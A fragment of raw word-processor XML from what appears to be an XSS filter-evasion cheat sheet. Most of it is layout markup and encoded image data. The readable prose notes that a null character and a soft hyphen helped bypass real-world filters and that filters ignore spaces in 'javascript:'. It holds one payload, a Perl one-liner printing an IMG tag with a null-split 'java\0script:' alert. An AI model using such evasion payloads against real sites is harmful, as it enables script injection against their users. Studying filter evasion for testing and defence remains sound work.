          <w:tab w:val="left" w:pos="8507"/>
        </w:tabs>
        <w:spacing w:before="75" w:line="333" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="383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49408" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>6094095</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>51435</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="208915" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1297" name="Group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915" cy="116205"/>
                          <a:chOff x="9597" y="81"/>
                          <a:chExt cx="329" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="1298" name="Picture 1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96" y="81"/>
                            <a:ext cx="32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9" name="Text Box 1299"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="9596" y="81"/>
                            <a:ext cx="32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4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%00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8" o:spid="_x0000_s1137" style="position:absolute;left:0;text-align:left;margin-left:479.85pt;margin-top:4.05pt;width:16.45pt;height:9.15pt;z-index:-17667072;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="9597,81" coordsize="329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">
                <v:shape id="Picture 1300" o:spid="_x0000_s1138" type="#_x0000_t75" style="position:absolute;left:9596;top:81;width:329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2u1/EAAAA3QAAAA8AAABkcnMvZG93bnJldi54bWxEj0FLAzEQhe+C/yGM4EVsti0UXZsWEYo9&#10;FRq9eBs242Z1M1mStLv+e+dQ6G2G9+a9b9bbKfTqTCl3kQ3MZxUo4ia6jlsDnx+7xydQuSA77COT&#10;gT/KsN3c3qyxdnHkI51taZWEcK7RgC9lqLXOjaeAeRYHYtG+YwpYZE2tdglHCQ+9XlTVSgfsWBo8&#10;DvTmqfm1p2CgVP0P+4eks+b98t3a05cdD8bc302vL6AKTeVqvlzvneAvngVXvpER9OY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S2u1/EAAAA3QAAAA8AAAAAAAAAAAAAAAAA&#10;nwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPcAAACQAwAAAAA=&#10;">
                  <v:imagedata r:id="rId15" o:title=""/>
                </v:shape>
                <v:shape id="Text Box 1299" o:spid="_x0000_s1139" type="#_x0000_t202" style="position:absolute;left:9596;top:81;width:32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wzQ8MA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9L/gfwgh7W1M9iK1GEXFBWFi21oPHsRnb&#10;YDPpNlG7/34jCN7m8T5nseptI27UeeNYwXiUgCAunTZcKTgUnx8zED4ga2wck4I/8rBaDt4WmGl3&#10;55xu+1CJGMI+QwV1CG0mpS9rsuhHriWO3Nl1FkOEXSV1h/cYbhs5SZKptGg4NtTY0qam8rK/WgXr&#10;I+db8/t9+snPuSmKNOGv6UWp92G/noMI1IeX+One6Th/kqbw+Cae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wzQ8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4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%00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7.11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Windows)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>were</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>vulnerable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additional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>173</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>soft</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>hyphen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>control</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>char).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>much</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3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useful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helped</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>me</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>certain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>real</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>world</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>filters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3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variation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example: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104775</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3364230" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1294" name="Group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4230" cy="116205"/>
                          <a:chOff x="1614" y="165"/>
                          <a:chExt cx="5298" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1295" name="Freeform 1297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5298" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 6891 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 5298"/>
                              <a:gd name="T2" fmla="+- 0 347 165"/>
                              <a:gd name="T3" fmla="*/ 347 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 5298"/>
                              <a:gd name="T6" fmla="+- 0 347 165"/>
                              <a:gd name="T7" fmla="*/ 347 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 5298"/>
                              <a:gd name="T10" fmla="+- 0 347 165"/>
                              <a:gd name="T11" fmla="*/ 347 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 5298"/>
                              <a:gd name="T14" fmla="+- 0 326 165"/>
                              <a:gd name="T15" fmla="*/ 326 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 5298"/>
                              <a:gd name="T18" fmla="+- 0 323 165"/>
                              <a:gd name="T19" fmla="*/ 323 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 5298"/>
                              <a:gd name="T22" fmla="+- 0 186 165"/>
                              <a:gd name="T23" fmla="*/ 186 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 5298"/>
                              <a:gd name="T26" fmla="+- 0 165 165"/>
                              <a:gd name="T27" fmla="*/ 165 h 183"/>
                              <a:gd name="T28" fmla="+- 0 6891 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 5298"/>
                              <a:gd name="T30" fmla="+- 0 165 165"/>
                              <a:gd name="T31" fmla="*/ 165 h 183"/>
                              <a:gd name="T32" fmla="+- 0 6912 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 5298"/>
                              <a:gd name="T34" fmla="+- 0 186 165"/>
                              <a:gd name="T35" fmla="*/ 186 h 183"/>
                              <a:gd name="T36" fmla="+- 0 6912 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 5298"/>
                              <a:gd name="T38" fmla="+- 0 326 165"/>
                              <a:gd name="T39" fmla="*/ 326 h 183"/>
                              <a:gd name="T40" fmla="+- 0 6894 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 5298"/>
                              <a:gd name="T42" fmla="+- 0 347 165"/>
                              <a:gd name="T43" fmla="*/ 347 h 183"/>
                              <a:gd name="T44" fmla="+- 0 6891 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 5298"/>
                              <a:gd name="T46" fmla="+- 0 347 165"/>
                              <a:gd name="T47" fmla="*/ 34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298" h="183">
                                <a:moveTo>
                                  <a:pt x="5277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277" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5298" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5298" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5280" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="527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Text Box 129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529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perl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7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-e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6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'print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6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"&lt;IMG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6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SRC=java\0script:alert(\"XSS\")&gt;";'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6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&gt;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6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5" o:spid="_x0000_s1140" style="position:absolute;margin-left:80.7pt;margin-top:8.25pt;width:264.9pt;height:9.15pt;z-index:-15709184;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,165" coordsize="5298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">
                <v:shape id="Freeform 1297" o:spid="_x0000_s1141" style="position:absolute;left:1614;top:165;width:5298;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="529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0DZMUA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywjemo0BS42uoSjBCr1UPbS3MTsm&#10;sdnZmF1j+u+7hUJv83ifs8wG04ieOldbVjCNYhDEhdU1lwqOh/zxGYTzyBoby6Tgmxxkq9HDElNt&#10;7/xO/d6XIoSwS1FB5X2bSumKigy6yLbEgTvbzqAPsCul7vAewk0jkzh+kgZrDg0VtrSuqPja34yC&#10;ZLvhz7f8NNterrfd4Zq3H7rcKTUZDy8LEJ4G/y/+c7/qMD+Zz+D3m3CC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XQNkxQAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m5277,182l21,182r-3,l,161r,-3l,21,21,,5277,r21,21l5298,161r-18,21l5277,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="5277,347;21,347;18,347;0,326;0,323;0,186;21,165;5277,165;5298,186;5298,326;5280,347;5277,347" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1296" o:spid="_x0000_s1142" type="#_x0000_t202" style="position:absolute;left:1614;top:165;width:5298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OnMcMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/0Pywi9mY0eQo2uIqWCUCjGePA4zY7J&#10;YnY2ZldN/71bKPQ2j/c5y/VgW3Gn3hvHCqZJCoK4ctpwreBYbidvIHxA1tg6JgU/5GG9ehktMdfu&#10;wQXdD6EWMYR9jgqaELpcSl81ZNEnriOO3Nn1FkOEfS11j48Ybls5S9NMWjQcGxrs6L2h6nK4WQWb&#10;Excf5vr1vS/OhSnLecqf2UWp1/GwWYAINIR/8Z97p+P82TyD32/iCX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OnM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perl</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-17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-e</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-16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'print</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-16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"&lt;IMG</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-16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SRC=java\0script:alert(\"XSS\")&gt;";'</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-16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&gt;</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-16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out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Spaces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Meta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Chars</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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XSS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="6989"/>
        </w:tabs>
        <w:spacing w:before="101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49920" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4705350</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>67945</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="633095" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1291" name="Group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7410" y="107"/>
                          <a:chExt cx="997" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1292" name="Freeform 1294"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="7409" y="107"/>
                            <a:ext cx="997" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 8385 7410"/>
                              <a:gd name="T1" fmla="*/ T0 w 997"/>
                              <a:gd name="T2" fmla="+- 0 289 107"/>
                              <a:gd name="T3" fmla="*/ 289 h 183"/>
                              <a:gd name="T4" fmla="+- 0 7431 7410"/>
                              <a:gd name="T5" fmla="*/ T4 w 997"/>
                              <a:gd name="T6" fmla="+- 0 289 107"/>
                              <a:gd name="T7" fmla="*/ 289 h 183"/>
                              <a:gd name="T8" fmla="+- 0 7428 7410"/>
                              <a:gd name="T9" fmla="*/ T8 w 997"/>
                              <a:gd name="T10" fmla="+- 0 289 107"/>
                              <a:gd name="T11" fmla="*/ 289 h 183"/>
                              <a:gd name="T12" fmla="+- 0 7410 7410"/>
                              <a:gd name="T13" fmla="*/ T12 w 997"/>
                              <a:gd name="T14" fmla="+- 0 268 107"/>
                              <a:gd name="T15" fmla="*/ 268 h 183"/>
                              <a:gd name="T16" fmla="+- 0 7410 7410"/>
                              <a:gd name="T17" fmla="*/ T16 w 997"/>
                              <a:gd name="T18" fmla="+- 0 265 107"/>
                              <a:gd name="T19" fmla="*/ 265 h 183"/>
                              <a:gd name="T20" fmla="+- 0 7410 7410"/>
                              <a:gd name="T21" fmla="*/ T20 w 997"/>
                              <a:gd name="T22" fmla="+- 0 128 107"/>
                              <a:gd name="T23" fmla="*/ 128 h 183"/>
                              <a:gd name="T24" fmla="+- 0 7431 7410"/>
                              <a:gd name="T25" fmla="*/ T24 w 997"/>
                              <a:gd name="T26" fmla="+- 0 107 107"/>
                              <a:gd name="T27" fmla="*/ 107 h 183"/>
                              <a:gd name="T28" fmla="+- 0 8385 7410"/>
                              <a:gd name="T29" fmla="*/ T28 w 997"/>
                              <a:gd name="T30" fmla="+- 0 107 107"/>
                              <a:gd name="T31" fmla="*/ 107 h 183"/>
                              <a:gd name="T32" fmla="+- 0 8406 7410"/>
                              <a:gd name="T33" fmla="*/ T32 w 997"/>
                              <a:gd name="T34" fmla="+- 0 128 107"/>
                              <a:gd name="T35" fmla="*/ 128 h 183"/>
                              <a:gd name="T36" fmla="+- 0 8406 7410"/>
                              <a:gd name="T37" fmla="*/ T36 w 997"/>
                              <a:gd name="T38" fmla="+- 0 268 107"/>
                              <a:gd name="T39" fmla="*/ 268 h 183"/>
                              <a:gd name="T40" fmla="+- 0 8388 7410"/>
                              <a:gd name="T41" fmla="*/ T40 w 997"/>
                              <a:gd name="T42" fmla="+- 0 289 107"/>
                              <a:gd name="T43" fmla="*/ 289 h 183"/>
                              <a:gd name="T44" fmla="+- 0 8385 7410"/>
                              <a:gd name="T45" fmla="*/ T44 w 997"/>
                              <a:gd name="T46" fmla="+- 0 289 107"/>
                              <a:gd name="T47" fmla="*/ 2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5" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="996" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="996" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="978" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="97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Text Box 1293"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="7409" y="107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javascript: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2" o:spid="_x0000_s1143" style="position:absolute;left:0;text-align:left;margin-left:370.5pt;margin-top:5.35pt;width:49.85pt;height:9.15pt;z-index:-17666560;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="7410,107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">
                <v:shape id="Freeform 1294" o:spid="_x0000_s1144" style="position:absolute;left:7409;top:107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36VMUA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2vCQBC+F/wPywheim5ModToGoJS8NAW6uM+Zsck&#10;mJ1Ns5tH/323UOhtPr7nbNLR1KKn1lWWFSwXEQji3OqKCwXn0+v8BYTzyBpry6Tgmxyk28nDBhNt&#10;B/6k/ugLEULYJaig9L5JpHR5SQbdwjbEgbvZ1qAPsC2kbnEI4aaWcRQ9S4MVh4YSG9qVlN+PnVHw&#10;/rWS+319zx4/3m6d666X65NeKjWbjtkahKfR/4v/3Acd5serGH6/CSf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jfpUxQAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m975,182r-954,l18,182,,161r,-3l,21,21,,975,r21,21l996,161r-18,21l975,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="975,289;21,289;18,289;0,268;0,265;0,128;21,107;975,107;996,128;996,268;978,289;975,289" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1293" o:spid="_x0000_s1145" type="#_x0000_t202" style="position:absolute;left:7409;top:107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EqcMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9C/6HMII3TVUQrUaRRWFBWLbWwx5nm7EN&#10;NpNuk9X67zcLgrd5vM9Zbztbixu13jhWMBknIIgLpw2XCs75YbQA4QOyxtoxKXiQh+2m31tjqt2d&#10;M7qdQiliCPsUFVQhNKmUvqjIoh+7hjhyF9daDBG2pdQt3mO4reU0SebSouHYUGFDbxUV19OvVbD7&#10;4mxvfj6+P7NLZvJ8mfBxflVqOOh2KxCBuvASP93vOs6fLmf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QEq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javascript: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useful</w:t>
      </w:r>
      <w:r>
        <w:rPr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pattern</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>match</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>doesn't</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>take</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>spaces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word</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-which</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>is correct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>since</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="76" w:line="333" w:lineRule="auto"/>
        <w:ind w:left="1195" w:right="1149" w:hanging="1041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5043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222250</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="633095" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1288" name="Group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614" y="350"/>
                          <a:chExt cx="997" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1289" name="Freeform 1291"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="349"/>
                            <a:ext cx="997" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2590 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 997"/>
                              <a:gd name="T2" fmla="+- 0 532 350"/>
                              <a:gd name="T3" fmla="*/ 532 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 997"/>
                              <a:gd name="T6" fmla="+- 0 532 350"/>
                              <a:gd name="T7" fmla="*/ 532 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 997"/>
                              <a:gd name="T10" fmla="+- 0 531 350"/>
                              <a:gd name="T11" fmla="*/ 531 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 997"/>
                              <a:gd name="T14" fmla="+- 0 511 350"/>
                              <a:gd name="T15" fmla="*/ 511 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 997"/>
                              <a:gd name="T18" fmla="+- 0 507 350"/>
                              <a:gd name="T19" fmla="*/ 507 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 997"/>
                              <a:gd name="T22" fmla="+- 0 371 350"/>
                              <a:gd name="T23" fmla="*/ 371 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 997"/>
                              <a:gd name="T26" fmla="+- 0 350 350"/>
                              <a:gd name="T27" fmla="*/ 350 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2590 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 997"/>
                              <a:gd name="T30" fmla="+- 0 350 350"/>
                              <a:gd name="T31" fmla="*/ 350 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2611 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 997"/>
                              <a:gd name="T34" fmla="+- 0 371 350"/>
                              <a:gd name="T35" fmla="*/ 371 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2611 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 997"/>
                              <a:gd name="T38" fmla="+- 0 511 350"/>
                              <a:gd name="T39" fmla="*/ 511 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2593 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 997"/>
                              <a:gd name="T42" fmla="+- 0 531 350"/>
                              <a:gd name="T43" fmla="*/ 531 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2590 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 997"/>
                              <a:gd name="T46" fmla="+- 0 532 350"/>
                              <a:gd name="T47" fmla="*/ 53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1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Text Box 1290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349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javascript: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9" o:spid="_x0000_s1146" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:17.5pt;width:49.85pt;height:9.15pt;z-index:-17666048;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,350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">
                <v:shape id="Freeform 1291" o:spid="_x0000_s1147" style="position:absolute;left:1614;top:349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D++MMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9C/sfwizsRdZUBdFqFFEW9rAK1vU+NmNb&#10;bCa1SbX+eyMI3ubxPme2aE0prlS7wrKCfi8CQZxaXXCm4H//8z0G4TyyxtIyKbiTg8X8ozPDWNsb&#10;7+ia+EyEEHYxKsi9r2IpXZqTQdezFXHgTrY26AOsM6lrvIVwU8pBFI2kwYJDQ44VrXJKz0ljFGwu&#10;E7lel+dld/t3alxzPByHuq/U12e7nILw1Pq3+OX+1WH+YDyB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D++MMAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m976,182r-955,l18,181,,161r,-4l,21,21,,976,r21,21l997,161r-18,20l976,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="976,532;21,532;18,531;0,511;0,507;0,371;21,350;976,350;997,371;997,511;979,531;976,532" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1290" o:spid="_x0000_s1148" type="#_x0000_t202" style="position:absolute;left:1614;top:349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aa3sYA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBCF74X+h2UKvdWNHkRTVxGpIAjFmB56nGbH&#10;ZDE7m2ZXTf995yB4m+G9ee+bxWrwrbpSH11gA+NRBoq4CtZxbeCr3L7NQMWEbLENTAb+KMJq+fy0&#10;wNyGGxd0PaZaSQjHHA00KXW51rFqyGMchY5YtFPoPSZZ+1rbHm8S7ls9ybKp9uhYGhrsaNNQdT5e&#10;vIH1Nxcf7vfz51CcCleW84z307Mxry/D+h1UoiE9zPfrnRX8yVz45RsZQS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laa3s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javascript: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that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>won't</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>render-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makes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false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>assumption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can't</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4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space</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
